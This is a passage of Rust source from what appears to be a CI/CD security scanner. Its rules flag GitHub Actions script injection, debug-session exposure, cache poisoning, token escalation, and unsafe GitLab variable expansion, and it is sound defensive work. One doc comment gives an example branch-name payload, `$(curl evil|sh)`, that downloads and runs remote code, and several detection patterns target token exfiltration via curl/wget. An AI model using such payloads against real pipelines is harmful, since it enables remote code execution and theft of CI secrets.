            .map(|rel| inner_from + rel)
        else {
            return found;
        };
        let end = inner_to + CLOSE.len();

        found.push((body[inner_from..inner_to].trim().to_string(), open..end));
        offset = end;
    }
}
4278
/// Classifies a (pre-trimmed) template expression as attacker-controllable
/// for R1. Any one of these is sufficient:
///
/// - it starts with one of the `github.event.*` context prefixes listed in
///   `EVENT_PREFIXES` (e.g. `github.event.issue.title`,
///   `github.event.pull_request.body`, `github.event.comment.body`);
/// - it is exactly `github.head_ref`, or `github.head_ref` followed by a
///   space (e.g. `github.head_ref || 'main'`);
/// - it is `inputs.` followed by at least one more character. The rule's
///   caller is expected to gate on the trigger surface, so every
///   `inputs.*` reference is treated as suspect here.
fn is_untrusted_context_expression(expr: &str) -> bool {
    const EVENT_PREFIXES: [&str; 7] = [
        "github.event.issue.",
        "github.event.pull_request.",
        "github.event.comment.",
        "github.event.review.",
        "github.event.discussion.",
        "github.event.workflow_run.",
        "github.event.inputs.",
    ];

    let from_event_payload = EVENT_PREFIXES
        .iter()
        .any(|prefix| expr.starts_with(*prefix));

    let is_head_ref = matches!(
        expr.strip_prefix("github.head_ref"),
        Some(rest) if rest.is_empty() || rest.starts_with(' ')
    );

    let is_input = matches!(
        expr.strip_prefix("inputs."),
        Some(rest) if !rest.is_empty()
    );

    from_event_payload || is_head_ref || is_input
}
4309
/// Returns true when an expression's value lands in a script sink that
/// matters for R1 — shell text, JS source, or a write to GITHUB_ENV /
/// GITHUB_OUTPUT.
///
/// Currently this is unconditional: both parameters are ignored and the
/// function always returns `true`. The reasoning is that the caller only
/// passes expressions found inside `META_SCRIPT_BODY`, and anything that
/// appears in the script body itself has, by definition, bypassed the
/// `env:`-indirection mitigation.
///
/// `_body` is the script text and `_range` the byte range of the expression
/// within it; they are accepted so a future heuristic can inspect the
/// surrounding context without changing call sites.
fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
    // Every occurrence inside META_SCRIPT_BODY qualifies — the body is the
    // shell/JS source itself. (Step-level `env:` values are stored on the
    // edges, not in the body.) Kept as a function so the doc string spells
    // the rationale and future heuristics have a clear hook.
    true
}
4324
4325/// R1 — script injection via untrusted context.
4326///
4327/// Severity: Critical. Classic GitHub Actions remote code execution: an
4328/// expression that an external actor controls (`github.event.issue.title`,
4329/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
4330/// gets concatenated into the shell command (or JS source for
4331/// `actions/github-script`) at YAML-render time, before any quoting or
4332/// escaping the runtime would apply to env-bound values.
4333pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
4334    let mut findings = Vec::new();
4335
4336    for step in graph.nodes_of_kind(NodeKind::Step) {
4337        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4338            continue;
4339        };
4340        if body.is_empty() {
4341            continue;
4342        }
4343
4344        let mut hits: Vec<String> = Vec::new();
4345        for (expr, range) in find_template_expressions(body) {
4346            if !is_untrusted_context_expression(&expr) {
4347                continue;
4348            }
4349            if !is_script_injection_sink(body, &range) {
4350                continue;
4351            }
4352            if !hits.contains(&expr) {
4353                hits.push(expr);
4354            }
4355        }
4356
4357        if hits.is_empty() {
4358            continue;
4359        }
4360
4361        // Cap preview to keep the message readable even when a step has many
4362        // distinct attacker-controlled interpolations.
4363        let preview: String = hits
4364            .iter()
4365            .take(3)
4366            .map(|s| format!("${{{{ {s} }}}}"))
4367            .collect::<Vec<_>>()
4368            .join(", ");
4369        let suffix = if hits.len() > 3 {
4370            format!(", and {} more", hits.len() - 3)
4371        } else {
4372            String::new()
4373        };
4374
4375        findings.push(Finding {
4376            severity: Severity::Critical,
4377            category: FindingCategory::ScriptInjectionViaUntrustedContext,
4378            path: None,
4379            nodes_involved: vec![step.id],
4380            message: format!(
4381                "Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
4382                step.name
4383            ),
4384            recommendation: Recommendation::Manual {
4385                action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
4386            },
4387            source: FindingSource::BuiltIn,
4388            extras: FindingExtras::default(),
4389        });
4390    }
4391
4392    findings
4393}
4394
4395/// R5 — interactive debug action in an authority workflow.
4396///
4397/// Severity: High. A successful tmate / upterm session opens an external SSH
4398/// endpoint into the runner with the full job environment loaded — every
4399/// secret in scope, the checked-out HEAD, and write access to whatever the
4400/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
4401/// (often a maintainer with `workflow_dispatch` permission) can launder the
4402/// job's authority off the runner.
4403pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
4404    let mut findings = Vec::new();
4405
4406    // Pre-compute whether the workflow holds non-default authority.
4407    // Two ways to qualify:
4408    //  (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
4409    //  (b) any GITHUB_TOKEN identity has a non-default write permission.
4410    let workflow_has_extra_secrets = graph.authority_sources().any(|n| match n.kind {
4411        NodeKind::Secret => true,
4412        NodeKind::Identity => {
4413            // GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
4414            // `GITHUB_TOKEN (<job>)`. Anything else is extra authority
4415            // (cloud OIDC, ADO service connection, …).
4416            !n.name.starts_with("GITHUB_TOKEN")
4417        }
4418        _ => false,
4419    });
4420
4421    let workflow_has_token_writes = graph
4422        .nodes_of_kind(NodeKind::Identity)
4423        .filter(|n| n.name.starts_with("GITHUB_TOKEN"))
4424        .any(|n| {
4425            n.metadata
4426                .get(META_PERMISSIONS)
4427                .map(|p| {
4428                    let s = p.to_lowercase();
4429                    s.contains("write") || s == "write-all"
4430                })
4431                .unwrap_or(false)
4432        });
4433
4434    if !(workflow_has_extra_secrets || workflow_has_token_writes) {
4435        return findings;
4436    }
4437
4438    for step in graph.nodes_of_kind(NodeKind::Step) {
4439        let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
4440            continue;
4441        };
4442
4443        findings.push(Finding {
4444            severity: Severity::High,
4445            category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
4446            path: None,
4447            nodes_involved: vec![step.id],
4448            message: format!(
4449                "Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
4450                step.name
4451            ),
4452            recommendation: Recommendation::Manual {
4453                action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
4454            },
4455            source: FindingSource::BuiltIn,
4456            extras: FindingExtras::default(),
4457        });
4458    }
4459
4460    findings
4461}
4462
4463/// R9 — PR-specific cache key in a default-branch consumer.
4464///
4465/// Severity: Medium. Speculative rule from the council gap report; the corpus
4466/// did not show a perfect example, so we emit Medium and document the risk.
4467/// A PR build that writes to a cache keyed on `github.head_ref` /
4468/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
4469/// that a later default-branch run can restore — letting an attacker poison
4470/// the build cache from a fork PR.
4471pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4472    let mut findings = Vec::new();
4473
4474    // Trigger gate: workflow must run on `push` (default branch) AND on a
4475    // PR-context trigger. Without the push side, the cache write never gets
4476    // restored by a privileged consumer; without the PR side, no untrusted
4477    // contributor can populate the cache to begin with.
4478    let triggers = graph.metadata.get(META_TRIGGERS);
4479    let runs_on_push = triggers_contain_any(triggers, &["push"]);
4480    let runs_on_pr = triggers_contain_any(triggers, &["pull_request", "pull_request_target"]);
4481    if !(runs_on_push && runs_on_pr) {
4482        return findings;
4483    }
4484
4485    for step in graph.nodes_of_kind(NodeKind::Step) {
4486        let Some(key) = step.metadata.get(META_CACHE_KEY) else {
4487            continue;
4488        };
4489        if key.is_empty() {
4490            continue;
4491        }
4492        // Detect PR-derived key fragments. Match common spelling variants.
4493        let lower = key.to_lowercase();
4494        let is_pr_keyed = lower.contains("github.head_ref")
4495            || lower.contains("github.event.pull_request.head.ref")
4496            || lower.contains("github.event.pull_request.head.sha")
4497            || lower.contains("github.actor")
4498            || lower.contains("github.triggering_actor");
4499        if !is_pr_keyed {
4500            continue;
4501        }
4502
4503        findings.push(Finding {
4504            severity: Severity::Medium,
4505            category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
4506            path: None,
4507            nodes_involved: vec![step.id],
4508            message: format!(
4509                "Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
4510                step.name
4511            ),
4512            recommendation: Recommendation::Manual {
4513                action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
4514            },
4515            source: FindingSource::BuiltIn,
4516            extras: FindingExtras::default(),
4517        });
4518    }
4519
4520    findings
4521}
4522
4523/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
4524///
4525/// Severity: Medium. Static permission checks see only the declared
4526/// `permissions:` block — they miss runtime calls that use the token to
4527/// perform write-class operations the workflow shouldn't be doing in a
4528/// PR-triggered context. Detects `gh ` invocations that mutate state
4529/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
4530/// in workflows triggered by `pull_request`, `issue_comment`, or
4531/// `workflow_run`.
4532pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
4533    let mut findings = Vec::new();
4534
4535    // Trigger gate.
4536    let triggers = graph.metadata.get(META_TRIGGERS);
4537    let risky_trigger = triggers_contain_any(
4538        triggers,
4539        &[
4540            "pull_request",
4541            "pull_request_target",
4542            "issue_comment",
4543            "workflow_run",
4544            "pull_request_review",
4545            "pull_request_review_comment",
4546        ],
4547    );
4548    if !risky_trigger {
4549        return findings;
4550    }
4551
4552    for step in graph.nodes_of_kind(NodeKind::Step) {
4553        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4554            continue;
4555        };
4556        if body.is_empty() {
4557            continue;
4558        }
4559        if !body_contains_gh_cli(body) {
4560            continue;
4561        }
4562        let Some(verb) = detect_gh_escalating_verb(body) else {
4563            continue;
4564        };
4565
4566        findings.push(Finding {
4567            severity: Severity::Medium,
4568            category: FindingCategory::GhCliWithDefaultTokenEscalating,
4569            path: None,
4570            nodes_involved: vec![step.id],
4571            message: format!(
4572                "Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
4573                step.name
4574            ),
4575            recommendation: Recommendation::Manual {
4576                action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
4577            },
4578            source: FindingSource::BuiltIn,
4579            extras: FindingExtras::default(),
4580        });
4581    }
4582
4583    findings
4584}
4585
/// True when `body` invokes the `gh` CLI as a command, as opposed to merely
/// containing the letters `gh` inside another word.
///
/// A `gh` token counts as an invocation when it is followed by a space or a
/// tab and is located in command position on its line, i.e. the text before
/// it (ignoring whitespace) is either empty or ends with one of the shell
/// command openers `&&`, `|` (which also covers `||`), `;`, `$(` or a
/// backtick.
///
/// Whitespace between the opener and `gh` is optional, so `a;gh …`,
/// `a &&<TAB>gh …` and `$( gh … )` are recognised in addition to the
/// conventionally spaced forms. The check is purely textual: it does not
/// parse quoting, so a `gh` that follows an opener inside a string literal
/// still matches.
fn body_contains_gh_cli(body: &str) -> bool {
    // Tokens after which the shell starts parsing a new command.
    const COMMAND_OPENERS: [&str; 5] = ["&&", "|", ";", "$(", "`"];

    body.lines().any(|line| {
        line.match_indices("gh").any(|(start, token)| {
            // `gh` must be a whole word on its right-hand side…
            let after = &line[start + token.len()..];
            if !after.starts_with([' ', '\t']) {
                return false;
            }
            // …and must sit where a command name is expected.
            let before = line[..start].trim_end();
            before.is_empty() || COMMAND_OPENERS.iter().any(|opener| before.ends_with(*opener))
        })
    })
}
4604
/// If `body` invokes a write-class `gh` verb, return a short label for it.
///
/// Matching is case-insensitive (the body is lower-cased first). Recognised,
/// in priority order:
///   - `gh pr merge`
///   - `gh release create` / `upload` / `delete` / `edit`
///   - `gh api` with an explicit write method — `-X <M>`, `-X<M>`,
///     `--method <M>` or `--method=<M>` where `<M>` is POST, PATCH, PUT or
///     DELETE. The flag may appear anywhere in the same logical command,
///     including after the endpoint path and across backslash-continued
///     lines (the multi-line `gh api \` + `--method POST \` layout).
///     When several methods occur the label follows the fixed order
///     POST, PATCH, PUT, DELETE.
///   - `gh api` against a mutation endpoint (`actions/secrets`,
///     `actions/variables`, `/environments`, `/releases`) combined with a
///     field/input flag, which makes `gh api` send a write request.
///
/// Returns `None` when none of the above is found. The scan is textual and
/// not quote-aware: a `;`, `&&` or `||` inside a quoted argument ends the
/// `gh api` command early for the purposes of the method search.
fn detect_gh_escalating_verb(body: &str) -> Option<String> {
    /// Text of one logical command following `gh api`: the rest of the
    /// current line plus any backslash-continued lines, cut at the first
    /// `;`, `&&` or `||`.
    fn command_tail(after: &str) -> String {
        let mut command = String::new();
        for line in after.lines() {
            let line = line.trim_end();
            match line.strip_suffix('\\') {
                Some(continued) => {
                    command.push_str(continued);
                    command.push(' ');
                }
                None => {
                    command.push_str(line);
                    break;
                }
            }
        }
        let end = [";", "&&", "||"]
            .iter()
            .filter_map(|sep| command.find(sep))
            .min()
            .unwrap_or(command.len());
        command.truncate(end);
        command
    }

    fn is_quote(c: char) -> bool {
        c == '"' || c == '\''
    }

    const PLAIN_VERBS: [&str; 5] = [
        "pr merge",
        "release create",
        "release upload",
        "release delete",
        "release edit",
    ];
    const WRITE_METHODS: [&str; 4] = ["post", "patch", "put", "delete"];

    let lower = body.to_lowercase();

    for verb in PLAIN_VERBS {
        if lower.contains(&format!("gh {verb}")) {
            return Some(verb.to_string());
        }
    }

    // `gh api` with an explicit HTTP method. Tokens are compared exactly so
    // header values such as `-X-Foo` never count as a method flag.
    let mut seen = [false; 4];
    let mut rest = lower.as_str();
    while let Some(at) = rest.find("gh api") {
        rest = &rest[at + "gh api".len()..];
        if !rest.starts_with(|c: char| c.is_whitespace() || c == '\\') {
            continue; // e.g. `gh apikey …` — not the `api` subcommand
        }
        let command = command_tail(rest);
        let mut tokens = command.split_whitespace().map(|t| t.trim_matches(is_quote));
        while let Some(token) = tokens.next() {
            let method = if token == "-x" || token == "--method" {
                tokens.next()
            } else {
                token
                    .strip_prefix("--method=")
                    .or_else(|| token.strip_prefix("-x"))
            };
            let Some(method) = method.map(|m| m.trim_matches(is_quote)) else {
                continue;
            };
            if let Some(slot) = WRITE_METHODS.iter().position(|known| *known == method) {
                seen[slot] = true;
            }
        }
    }
    if let Some(slot) = seen.iter().position(|hit| *hit) {
        return Some(format!("api -X {}", WRITE_METHODS[slot].to_uppercase()));
    }

    // Path-based heuristic: even without an explicit method, certain
    // endpoints are mutation endpoints
    // (`gh api repos/.../actions/secrets/FOO -F ...`).
    let path_markers = [
        "actions/secrets",
        "actions/variables",
        "/environments",
        "/releases",
    ];
    if lower.contains("gh api ") && path_markers.iter().any(|m| lower.contains(m)) {
        // Only escalate when there is also a write flag. `-f`/`-F` (both
        // `-f` after lower-casing), `--field` and `--input` imply
        // POST/PATCH semantics under `gh api`.
        let writes = lower.contains(" -f ")
            || lower.contains(" -f=")
            || lower.contains(" -f\"")
            || lower.contains(" --field")
            || lower.contains(" --input");
        if writes {
            return Some("api (mutation endpoint)".into());
        }
    }
    None
}
4659
4660// ── GitLab CI rules ─────────────────────────────────────────
4661
/// GitLab CI predefined variables whose value is chosen by whoever pushes a
/// branch or tag, writes a commit, or opens a merge request — i.e. values an
/// attacker can control. The shell-interpolation rule treats any expansion
/// of these in a script as dangerous because the runner would execute
/// whatever the attacker placed inside `` $(...) `` or backticks.
///
/// Order matters only for presentation: findings list the variables in the
/// order given here.
const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
    // Ref names (branch / tag).
    "CI_COMMIT_BRANCH",
    "CI_COMMIT_REF_NAME",
    "CI_COMMIT_TAG",
    // Commit metadata.
    "CI_COMMIT_MESSAGE",
    "CI_COMMIT_TITLE",
    "CI_COMMIT_DESCRIPTION",
    "CI_COMMIT_AUTHOR",
    // Merge-request metadata.
    "CI_MERGE_REQUEST_TITLE",
    "CI_MERGE_REQUEST_DESCRIPTION",
    "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
];
4678
4679/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
4680/// by default — registry write, package upload, project read) used as a
4681/// bearer credential against an external HTTP endpoint, or fed to
4682/// `docker login` for `registry.gitlab.com`.
4683///
4684/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
4685/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
4686/// - a `curl` / `wget` / `http` / `https.request` invocation, OR
4687/// - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
4688/// - a `docker login` for `registry.gitlab.com`.
4689///
4690/// Severity: High. Category: Credentials.
4691pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
4692    let mut findings = Vec::new();
4693
4694    for step in graph.nodes_of_kind(NodeKind::Step) {
4695        let body = match step.metadata.get(META_SCRIPT_BODY) {
4696            Some(b) if !b.is_empty() => b,
4697            _ => continue,
4698        };
4699
4700        if !body_references_ci_job_token(body) {
4701            continue;
4702        }
4703
4704        let sink = classify_ci_job_token_sink(body);
4705        let Some(sink) = sink else {
4706            continue;
4707        };
4708
4709        findings.push(Finding {
4710            severity: Severity::High,
4711            category: FindingCategory::CiJobTokenToExternalApi,
4712            path: None,
4713            nodes_involved: vec![step.id],
4714            message: format!(
4715                "Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
4716                step.name, sink
4717            ),
4718            recommendation: Recommendation::Manual {
4719                action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
4720            },
4721            source: FindingSource::BuiltIn,
4722            extras: FindingExtras::default(),
4723        });
4724    }
4725
4726    findings
4727}
4728
/// True when `body` mentions the job token in either shell spelling,
/// `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}`. Plain substring search.
fn body_references_ci_job_token(body: &str) -> bool {
    ["$CI_JOB_TOKEN", "${CI_JOB_TOKEN}"]
        .iter()
        .any(|spelling| body.contains(spelling))
}
4732
4733/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
4734/// sink description, or None when the token only appears in benign ways
4735/// (e.g. assignment to an env var that's never read).
4736fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
4737    let lower = body.to_lowercase();
4738    // gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
4739    if lower.contains("gitlab-ci-token:") && body_references_ci_job_token(body) {
4740        if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
4741            return Some("docker login registry.gitlab.com");
4742        }
4743        if lower.contains("curl") || lower.contains("wget") {
4744            return Some("curl/wget Basic auth (user gitlab-ci-token)");
4745        }
4746        return Some("Basic-auth credential (user gitlab-ci-token)");
4747    }
4748    // JOB-TOKEN: header form (curl/wget against /api/v4/...).
4749    if lower.contains("job-token:") && body_references_ci_job_token(body) {
4750        return Some("JOB-TOKEN header to GitLab API");
4751    }
4752    // curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
4753    if (lower.contains("curl") || lower.contains("wget"))
4754        && (lower.contains("authorization:") || lower.contains("private-token:"))
4755        && body_references_ci_job_token(body)
4756    {
4757        return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
4758    }
4759    // Generic: token appears next to a CI_API_V4_URL request — strong signal.
4760    if body.contains("CI_API_V4_URL") && body_references_ci_job_token(body) {
4761        return Some("HTTP request to ${CI_API_V4_URL} with token");
4762    }
4763    None
4764}
4765
4766/// Rule: GitLab `id_tokens:` audience reused across MR-context and
4767/// protected-context jobs in the same file (no audience separation), or set
4768/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
4769/// path that the consuming job doesn't need.
4770///
4771/// Detection: collect every OIDC Identity node (Identity with
4772/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
4773/// - Wildcard / `*` audience → fire (b).
4774/// - Same audience reachable from at least one Step marked `META_TRIGGER ==
4775///   merge_request` AND at least one Step that is NOT (i.e. protected-context
4776///   only) → fire (a).
4777///
4778/// Severity: High. Category: Privilege.
4779pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
4780    use std::collections::HashMap as Map;
4781
4782    let mut findings = Vec::new();
4783
4784    // Collect (audience → (identity_id, [step_ids that reach it])).
4785    let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
4786
4787    for ident in graph.nodes_of_kind(NodeKind::Identity) {
4788        let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
4789        if !is_oidc {
4790            continue;
4791        }
4792        let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
4793            continue;
4794        };
4795        if aud == "unknown" || aud.is_empty() {
4796            continue;
4797        }
4798
4799        // Find steps that hold this identity via HasAccessTo.
4800        let mut consumers: Vec<NodeId> = Vec::new();
4801        for step in graph.nodes_of_kind(NodeKind::Step) {
4802            let holds = graph
4803                .edges_from(step.id)
4804                .any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
4805            if holds {
4806                consumers.push(step.id);
4807            }
4808        }
4809        by_aud
4810            .entry(aud.as_str())
4811            .or_default()
4812            .push((ident.id, consumers));
4813    }
4814
4815    for (aud, entries) in &by_aud {
4816        // (b) Wildcard / suspiciously broad audience.
4817        let is_wildcard = *aud == "*"
4818            || aud.contains("/*")
4819            || aud.eq_ignore_ascii_case("any")
4820            || aud.eq_ignore_ascii_case("default");
4821        if is_wildcard {
4822            // Use the first identity node as the anchor.
4823            if let Some((ident_id, consumers)) = entries.first() {
4824                let mut nodes_involved = vec![*ident_id];
4825                nodes_involved.extend(consumers.iter().copied());
4826                findings.push(Finding {
4827                    severity: Severity::High,
4828                    category: FindingCategory::IdTokenAudienceOverscoped,
4829                    path: None,
4830                    nodes_involved,
4831                    message: format!(
4832                        "OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
4833                    ),
4834                    recommendation: Recommendation::Manual {
4835                        action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
4836                    },
4837                    source: FindingSource::BuiltIn,
4838                    extras: FindingExtras::default(),
4839                });
4840                continue;
4841            }
4842        }
4843
4844        // (a) Same audience reachable from MR-context AND non-MR-context steps.
4845        let all_consumers: Vec<NodeId> = entries
4846            .iter()
4847            .flat_map(|(_, c)| c.iter().copied())
4848            .collect();
4849        let mut has_mr = false;
4850        let mut has_protected = false;
4851        for sid in &all_consumers {
4852            let Some(step) = graph.node(*sid) else {
4853                continue;
4854            };
4855            if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
4856                has_mr = true;
4857            } else {
4858                has_protected = true;
4859            }
4860        }
4861        if has_mr && has_protected && !entries.is_empty() {
4862            // Anchor at the first identity node carrying this audience.
4863            let (ident_id, _) = &entries[0];
4864            let mut nodes_involved = vec![*ident_id];
4865            nodes_involved.extend(all_consumers.iter().copied());
4866            findings.push(Finding {
4867                severity: Severity::High,
4868                category: FindingCategory::IdTokenAudienceOverscoped,
4869                path: None,
4870                nodes_involved,
4871                message: format!(
4872                    "OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
4873                ),
4874                recommendation: Recommendation::Manual {
4875                    action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
4876                },
4877                source: FindingSource::BuiltIn,
4878                extras: FindingExtras::default(),
4879            });
4880        }
4881    }
4882
4883    findings
4884}
4885
4886/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
4887/// shell context (`script:` / `before_script:` / `after_script:` /
4888/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
4889/// part of the runner.
4890///
4891/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
4892/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
4893/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
4894/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
4895/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
4896///
4897/// Severity: High. Category: Injection.
4898pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
4899    let mut findings = Vec::new();
4900
4901    for step in graph.nodes_of_kind(NodeKind::Step) {
4902        let mut hits: Vec<&str> = Vec::new();
4903        let mut where_hit: Vec<&str> = Vec::new();
4904
4905        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4906            for var in UNTRUSTED_GITLAB_CI_VARS {
4907                if shell_body_unsafely_expands(body, var) {
4908                    hits.push(*var);
4909                    where_hit.push("script");
4910                }
4911            }
4912        }
4913        if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
4914            for var in UNTRUSTED_GITLAB_CI_VARS {
4915                if url_interpolates_var(url, var) {
4916                    if !hits.contains(var) {
4917                        hits.push(*var);
4918                    }
4919                    if !where_hit.contains(&"environment.url") {
4920                        where_hit.push("environment.url");
4921                    }
4922                }
4923            }
4924        }
4925
4926        if hits.is_empty() {
4927            continue;
4928        }
4929
4930        // Dedup hit list while preserving order.
4931        let mut seen = std::collections::HashSet::new();
4932        let names: Vec<&str> = hits.into_iter().filter(|n| seen.insert(*n)).collect();
4933        let mut wh = where_hit;
4934        wh.sort();
4935        wh.dedup();
4936        let where_str = wh.join(" + ");
4937        let names_str = names.join(", ");
4938
4939        findings.push(Finding {
4940            severity: Severity::High,
4941            category: FindingCategory::UntrustedCiVarInShellInterpolation,
4942            path: None,
4943            nodes_involved: vec![step.id],
4944            message: format!(
4945                "Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
4946                step.name, names_str, where_str
4947            ),
4948            recommendation: Recommendation::Manual {
4949                action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
4950            },
4951            source: FindingSource::BuiltIn,
4952            extras: FindingExtras::default(),
4953        });
4954    }
4955
4956    findings
4957}
4958
/// Returns true if `body` contains an *unsafe* expansion of `$VAR` /
/// `${VAR}` — i.e. one that the shell would actually expand and that is not
/// obviously sanitised. Conservative: errs on the side of flagging because
/// the cost of a false negative (RCE) dwarfs the cost of a false positive
/// (one extra review comment).
///
/// The body is examined line by line (leading `-`, spaces and tabs are
/// stripped first; empty lines and lines starting with `#` are ignored):
/// - A line mentioning `printf %q`, or containing `${` together with `@Q}`
///   or `//[^`, is treated as sanitised and skipped entirely.
/// - A reference is safe only when it sits inside a single-quoted region.
///   Quote state is tracked the way a POSIX shell does: a `'` inside double
///   quotes is a literal character, so `"Branch '$VAR'"` still expands and
///   IS flagged; a backslash outside single quotes escapes the next
///   character.
///
/// Quote state does not carry over from one line to the next. `var` is
/// matched as a plain prefix, so `$VAR_SUFFIX` also counts as a reference.
fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
    /// True when a character placed right after `prefix` would be inside an
    /// open single-quoted region.
    fn ends_inside_single_quotes(prefix: &str) -> bool {
        let mut in_single = false;
        let mut in_double = false;
        let mut chars = prefix.chars();
        while let Some(c) = chars.next() {
            match c {
                // Backslash is literal inside '...'; elsewhere it escapes
                // the following character.
                '\\' if !in_single => {
                    chars.next();
                }
                '\'' if !in_double => in_single = !in_single,
                '"' if !in_single => in_double = !in_double,
                _ => {}
            }
        }
        in_single
    }

    let dollar = format!("${var}");
    let dollar_brace = format!("${{{var}}}");

    // Cheap early exit: the variable does not appear at all.
    if !body.contains(&dollar) && !body.contains(&dollar_brace) {
        return false;
    }

    body.lines().any(|raw| {
        let line = raw.trim_start_matches(['-', ' ', '\t']);
        if line.is_empty() || line.starts_with('#') {
            return false;
        }

        // Sanitiser keyword present somewhere on the line — be lenient and
        // skip the whole line.
        let sanitised = line.contains("printf %q")
            || (line.contains("${") && (line.contains("@Q}") || line.contains("//[^")));
        if sanitised {
            return false;
        }

        line.match_indices(dollar.as_str())
            .chain(line.match_indices(dollar_brace.as_str()))
            .any(|(pos, _)| !ends_inside_single_quotes(&line[..pos]))
    })
}
5007
